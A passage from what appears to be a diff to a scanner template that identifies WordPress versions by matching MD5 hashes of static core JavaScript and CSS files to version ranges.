4.5.23 + dsl: + - "(\"cf88e57d3607009d841323d6e9d63f5c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + 
- "(\"3bdff653d5bdbc0a4446629efdf092a6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"2ddb9c1a0460fb2bd1684880ec5e4b7f\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"35f23fc2280b36e67ad2afb8c6737a03\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"e71c620fc51e33ea2520d4fc4c4e6a1d\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"14c9bc1def45cfccbb2f373ce18eab15\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"d76196885628d30f368438b677af21c9\" == md5(body))" + - type: dsl + name: 3.0 - 3.2.1 + dsl: + - "(\"b7af24abaa51453f7aef518ff4cf5be4\" == md5(body))" + - type: dsl + name: 2.7 - 2.9.2 + dsl: + - "(\"d356512a353a71d70dbeddc53fdf93ce\" == md5(body))" + - type: dsl + name: 2.6.1 - 2.6.5 + dsl: + - "(\"fbd7d52b70da05ac5766d38def80640e\" == md5(body))" + - type: dsl + name: 2.6 + dsl: + - "(\"af2c241362bc2db6bf4a1ef85b8c1900\" == md5(body))" + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"6b88a75b7cca4c87d4b0e0f76b80613f\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.5 + dsl: + - "(\"70286b97d5864bfc0872ee0aba7592ec\" == md5(body))" + - type: dsl + name: 4.9.6 - 5.0.11 + dsl: + - "(\"6892675f6dabe164a066d42040451ffd\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4a03b95e0743063cbeccc8e5e88b12db\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"755f417e35f6e509919b4ed9779ef194\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"630fe75a208e73076c51908d642ed8b1\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"ec4fea38c27fedb1f549773ee967311f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c0b614a2810b91a5242adb6cb38d3420\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"46120afa9c33ecf316c421b3a73878d6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/plupload/wp-plupload.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - 
"(\"2b6f0cc54e381fd52f3a3726e09c1d07\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"d3ac6be23d260f9cd35bedfe4d578536\" == md5(body))" + - type: dsl + name: 4.1 - 4.4.24 + dsl: + - "(\"659d8f1d3bfd32cf405f6591d0521e7c\" == md5(body))" + - type: dsl + name: 3.9 - 4.0.32 + dsl: + - "(\"a5aa5e94961a7956616cb53188a39d7e\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"9f525a1f1daa87dfbc70e3799598177b\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a9c4b3dcac8cb4cd962ee0e16cdf5f8c\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"839d6017ae96d4f4bfd3a8a88b5bd131\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - "(\"789f878bf9f2bbefcbbf4809400fb4c9\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"723a6f72315da6e688f995bd48d4af5e\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"02dcb077436fc774c545183ee6758e46\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6ee451c64cfaeb2ac6a52570859b7d7f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"211e6c30ed511e57b88efe2a2b97c5fd\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"640c78f58918e7b49621cf4cf9cc6752\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/mce-view.js" + matchers: + - type: dsl + name: 4.8.2 - 4.8.15 + dsl: + - "(\"a02d8e96c2f2ca0fc149b7c4c1385c9c\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"3171547f82442fc2d55817bfa741315a\" == md5(body))" + - type: dsl + name: 4.7.6 - 4.7.19 + dsl: + - "(\"121281e52f8f9965f747ca5e8ab92abe\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.5 + dsl: + - "(\"e79d4033829ddc9cb1d968100df9b094\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"134875901c4aeec9dd4d791828e635a1\" == md5(body))" + - type: dsl + name: 4.6.7 - 4.6.20 + dsl: + - "(\"6be4f47b111998d7c3f88336950240fd\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.6 + dsl: + - 
"(\"b3cb42fc1d614d798625962d17e8f2ac\" == md5(body))" + - type: dsl + name: 4.4 - 4.5.9 + dsl: + - "(\"985f1702972d4eef6b3665a0cee35c5b\" == md5(body))" + - type: dsl + name: 4.4.11 - 4.5.23 + dsl: + - "(\"9c171534b6904b542a02ba6e85646da7\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.11 + dsl: + - "(\"5d93951714ec40da1cd2defc66fb4ce0\" == md5(body))" + - type: dsl + name: 4.3.12 - 4.3.25 + dsl: + - "(\"3993177e8de05866db54370ef2cc1a16\" == md5(body))" + - type: dsl + name: 4.2.3 - 4.2.15 + dsl: + - "(\"d5bad7fcb5c9c00f9fcb77bbfbf4646a\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"20d3f2cf57d63060adbe47ccaae6919f\" == md5(body))" + - type: dsl + name: 4.2.16 - 4.2.29 + dsl: + - "(\"8621171808a24ad81795d1804c1bc43c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.18 + dsl: + - "(\"09186e22f2a86dbde1dec5de41d00321\" == md5(body))" + - type: dsl + name: 4.1.19 - 4.1.32 + dsl: + - "(\"099b86bb322333cbe7687cf8f8fe4a09\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.18 + dsl: + - "(\"60702513880e16adb71448cf115a9f6d\" == md5(body))" + - type: dsl + name: 4.0.19 - 4.0.32 + dsl: + - "(\"95b8b4588c3cfe067139835d87ff7c0d\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"060bb01b7454220cd57ded1ade4ae3aa\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"3ab7c5e518658b152c35ee8ff512fdc4\" == md5(body))" + - type: dsl + name: 3.5 - 3.8.35 + dsl: + - "(\"09f646383af1481207855a1eaf2d8f16\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"1163b4783b075a846141a411ea2d5209\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"f2e51a6cc3a8ea3f6d149602645bcb91\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"946c78e0f2ae661b7ca6acb3a80987c0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"41e4a587bb092d37b80b8f197f6842c1\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"040bc7424efb883e7226c1d9449fe71e\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: 
+ - "(\"3273b048aba1d9913b5bbfa918960973\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/widgets-rtl.min.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"5133e5b6aa9c65dc7a385dfe2e395607\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"28048bd84191c288acbb362dea9da056\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"56dcc8388a67eea5a342dc00491867e4\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"2376bf23907c57f6e89dd987b5ed3fb7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"c44000ca530596769874bb8e725adba6\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.16 + dsl: + - "(\"9c02078d0cb2936ed51d3590fbc5d4df\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"588617d976f0fb7e8d6377001ceda9b3\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8f3b1166439554f8821758ce3f53a45f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"b08752318b9c677797dd97e3035730a7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"d13a6498560ed8a0e7e637376fdb38d8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"aa169601709ec48a851e50bf7b4df792\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"1de46221189dbf7578b5cfa92e722cc1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/widgets.min.css" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"54e466ebec259ef39e66374768426fb8\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"c2c8b0acd264abd814f40dab2563f3cf\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"feeb10baeb29b091f5d9cd6beccc0c16\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"054a9a4f057e1057120fa094954e85e7\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"d26e12df2dd2acb67f3e768e01f5b5d8\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.16 + dsl: + - "(\"19c552633033aa4eab0627ace254e478\" == 
md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"35ac681c6587823563f4ecee720be77e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0c32ce84717519f1ab8d89ef8cc1c6aa\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"5092d40859d943f65627049abf981d69\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"cb7baee9f7277ad7a550f10e038c4d35\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"8f8ed98776719f11c67006155b77a503\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"96f7b64b0a293ac2e43d228f140f4568\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/color-picker-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"12a802c8cbfa88cc665b0994bc8078be\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"6996ba94f4b34f766673ae879e4a42d5\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"e6e925fb28b187d58f2a354f12bdb56f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"3c83b20f43ff0c65312d1f9fa2d09dbb\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"3646498d3f7a1ef1d030eedfef4d8b7f\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b95a1b3477b0c06cfa7f65a11d24bbe8\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"0d4f8264edecbb041953ef3c360724a8\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5f12fd52fc0a85758a30b0eebd0ddc70\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"cc1d21402180701c47c1455bc5847fdb\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"35a559a8d3f4dddca3af16ae66c3cf9a\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"ed1555ab1980b0a7980504a6acfa5f54\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"cccc0c8b5781a897c2797f83384ee717\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"92976428bea2c2f91fe83b05ca5ea792\" == md5(body))" + - 
type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"5eae583d4410229d647883abefc5b1b0\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"0d106d6a3700a6bb7483879d5b8dfd9f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"3a59db8bd48105485439d60f7ac0724f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"efbb612a09e588d6e30d9059a37edf41\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"e984b359754d68064546821a1dfa1c61\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/color-picker.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"2538bba34977629156eb95be7d22407f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"9c7f4adc0cd1fe1a15e89ff4082f4b7c\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"d156a5d5a2d81aa45d55b389236e8ce1\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"9318703417f33d95bd763eedd948458c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"872f4d623649b2d92097ec890c34d3bf\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"b4bbb3b27d8fa55598129646b3bf278f\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"c381190bf97c9f1ee41c777e93b12351\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"c976ab722a8e8698ca56a38df290504b\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"37cbd34c7179a2f7445918849718d8fb\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"9d746a565ddc0e7ad9f9521644289b90\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"3b55aee012fbb85df3b3fd5d0f85a60c\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"97228f8038ad04b998ee386178c9172e\" == md5(body))" + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"267633fa6a190b5fa93afcc31f25adac\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"0afe195a271ca7a4bf8f08000bf943a2\" == md5(body))" + - type: dsl + name: 5.2.3 - 
5.2.9 + dsl: + - "(\"fd3b392c0f810400081121da5a126dd0\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"facd6968ed068cdedb3116f4a2622a93\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"23092c4dff038dd3816799c6316d122d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"192fcdf5a7dae10e778909851e32daa2\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"b06dabae90e1bbb1c1c936b8c6660bf9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/color-picker-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"ee85b5250e7815439f67eca0ceb59036\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"f875ffad5553d662beea97e63ec24bbf\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"3ca392110eade74ac3d8c28e70482844\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2edae70311d6de48156afa8ca917f432\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"f9e65b1bb803a9710e3447d689c1d361\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"ffd34afb44098936fc2be7362680e0cc\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"7d5a0ea95d3801084e0b9aedfb6a8c10\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"2ea14e975c4bc7d5e1c28b575b1cb940\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"96caf0347b9d3d8caf8fe65fff4d7ca2\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"de3577867deb3d96f8a587a17b59af5f\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8c4e9e4548bc64ed268f8f439d7c7c15\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0ff078a3f7baf8d8769056da9d716780\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"5ff8af8e60911aaf02b87090d443807f\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"907dd7dd486d3e6bb25b36d3b8e911d9\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - 
"(\"f18bd5023076c4185b77065ee7f93ade\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"fb72212cb33ced43457ffc0e6b715ac8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5f27b2435a5ebbaa64894de16d3a01a3\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"834b5f756a3a6d4a7b53d9e9b8eb8252\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/color-picker.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"491203d53f7340386ac8c4cd77037620\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"12b60d94f9826d402e66c2e9194aa80b\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"397074641a606a0a2d568df73d020562\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"aff61e2d6b0c8508660bf5e84c8658e3\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"2d0d4dc75f8710681395c1b31c6c662f\" == md5(body))" + - type: dsl + name: 4.0 - 4.1.32 + dsl: + - "(\"b51e0884a4d3518fa2eed8a2e6248078\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"a524dc26a603495c337003e58b22ed32\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"bb259343e9e768b09cfb600230ef29c1\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"b90e7baca3cbec8c1d5a11da060bcdfd\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"22295bf92914ef4879b36a640326ad19\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"aa73ab1f23b74890805f2331ca695045\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"e62ecc1c0e687cffa3c68ce2a0ec06dc\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"67f85a94b1d72de7e104c58ee9bc450a\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"33c7b9426ba9f1a6a4376b3ca1f46427\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"4d52e18de0b095dddb25fa4b62917529\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - 
"(\"0e1541a8fb8c53e12386575a492301da\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0027d5e4a0fe6b521a07f94adea4d373\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"3be49c25423a3be9d7d5367c0182a5b9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/custom-html-widgets.js" + matchers: + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"e5e40f16166f580e6c8289a7e219e1f4\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"58dbb81230e96444f2de93603322dbac\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"509037f00aa46fcdb410056240b0769c\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.3.6 + dsl: + - "(\"0c079b9a73b9cfc434e2188b5b9a2ce8\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b96ede4ca000191624f6b1abbc8a2d02\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"54667710ec100561789a6303887e681e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-preview-nav-menus.js" + matchers: + - type: dsl + name: 4.7.1 - 4.8.15 + dsl: + - "(\"207399a4074c9ef066c5834c07e43f08\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"191408780b5578f0b022dece40792719\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"224df0174bc39fd8f3f1ce3bc0b428f8\" == md5(body))" + - type: dsl + name: 4.3 - 4.4.24 + dsl: + - "(\"272fac6db6ba470a966e5e363fff1335\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"a475fa643ad31db4aaa72d48169ee109\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"bfdaaed26c7669aba522ef65bdcdd778\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1bd63167853ac0f0233ef6ac84cd8e66\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"1b5b4e6d2012ac6cf156d2aa3384a68e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-models.js" + matchers: + - type: dsl + name: 4.3 - 4.8.15 + dsl: + - "(\"3a799b747d1cc99f440ec4630a32e040\" 
== md5(body))" + - type: dsl + name: 3.9.1 - 4.2.29 + dsl: + - "(\"d420d2bafa7a4370a74f45ad61d956ec\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"edb4c59aa080eeaa22439faba31f8558\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"28a921114915381d0837f90180e29f9c\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"edc8e3858fdd8365e03b244c9d368f37\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"f7e77d350b7cf67c70c6e43c0686ac12\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"f42702f4ffb78b7e477e0f10f6d49e9c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/customize-selective-refresh.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"f6d9c5afa874858948a15bb7567ed172\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.19 + dsl: + - "(\"0aa9f21b635906c5318b64c3aedbb8fe\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"82eba93b7a9b05a56acfded2d3ce65e5\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"68c83cd50c29e7924959c18b4ee5cc84\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"4283cafe0808f3ffec6f73ffb06606e4\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"119b9a27369eaef7e59ef6424d4cdf52\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"94ba6c46025a2bf27bc2a00fcc084394\" == md5(body))" + - type: dsl + name: 4.9.3 - 5.0.11 + dsl: + - "(\"527d1e0957b88a45d872f4a318e8ec13\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"d5e80910e6bcb047f36fa770e5af9b7a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"7f248c87891b1c02b1d2fd791e67cfb7\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"be7550e5b289eb30781afc91b6e2e314\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/media.js" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"9ddd4d762d805b2c5ea458515cc5e217\" == md5(body))" + - type: dsl + name: 4.2 - 
4.5.23 + dsl: + - "(\"cf85d75e70304c42f77553ee9b9ec585\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.1.32 + dsl: + - "(\"fc6243e6ea74f2ca62bffb849de3657f\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"8b7746f89178fcba2f84b7f4dd295571\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"117fe2f7bd8e78b992eb115a95107c62\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"d22ba8b7c26828ae98c4f152804bde39\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"cd257239f5da18126d80cef91c920c36\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"04602e573c17983fa825c1cdcdd368cb\" == md5(body))" + - type: dsl + name: 3.1 - 3.3.3 + dsl: + - "(\"1e1ff96cf9f43d17873d7fd6eaf2adf2\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"850df1d822d0e22ef2c3ebd3cf19b99e\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"cdb50c9c1f1d6c177cc146dd1669d255\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"f5f319c12c4a5494df30c1d326465a6b\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"d9bf61cf4192c0a437323ef3bd70132d\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"a3f5caf5986947eb51f0f3770770ff63\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9f2e447602026b88cfc72ada19933004\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"440c1456719a7ea03648adcfbf3b59b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/widgets/media-widgets.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"4b21921e3e0ff0e78d677fe9286923d3\" == md5(body))" + - type: dsl + name: 4.8 + dsl: + - "(\"b8300b64a85bea2d8bb7ba4c8ac810be\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"42607f91d7bb0160a1f7635b2b36c67c\" == md5(body))" + - type: dsl + name: 5.1 - 5.3 + dsl: + - "(\"4cacc9c3fcc9b6e7a9bd5802357e3d7f\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - 
"(\"8b85ef7b2e2dc7be48e62ef794142ffc\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"01c5d623834a0c9561e54063a8cdebb5\" == md5(body))" + - type: dsl + name: 5.5 - 5.6 + dsl: + - "(\"06c56794790f5de1745b1215223eaf0b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-ajax-response.js" + matchers: + - type: dsl + name: 4.7 - 4.9.4 + dsl: + - "(\"c404d2ebab29a76e5a4eef0a23c3eb10\" == md5(body))" + - type: dsl + name: 4.5 - 4.6.20 + dsl: + - "(\"782715051d87f0cf1f869f5b2358db2b\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.4.24 + dsl: + - "(\"4eee92d2ee86812037ed3afbcab3bf9a\" == md5(body))" + - type: dsl + name: 4.2 - 4.3 + dsl: + - "(\"cf231fd7fd235076995cd3ea70c31f92\" == md5(body))" + - type: dsl + name: 3.8 - 4.1.32 + dsl: + - "(\"316dc6a88af5010df7bee09c481950e8\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"54b536447cd644bcafa51a568be8c54e\" == md5(body))" + - type: dsl + name: 2.9 - 3.4.2 + dsl: + - "(\"1da637535cdded009a8dde077e234430\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"18554862b00befc3db669e3c4af0f568\" == md5(body))" + - type: dsl + name: 2.7.1 + dsl: + - "(\"0289d1c13821599764774d55516ab81a\" == md5(body))" + - type: dsl + name: 2.5 - 2.7 + dsl: + - "(\"e4e96312e1bb476fc634ae4fcebde13b\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"4134afac564acdd0f18f6cd705ee7759\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"f1eb3b28419b46bc4d93f760e543167d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - 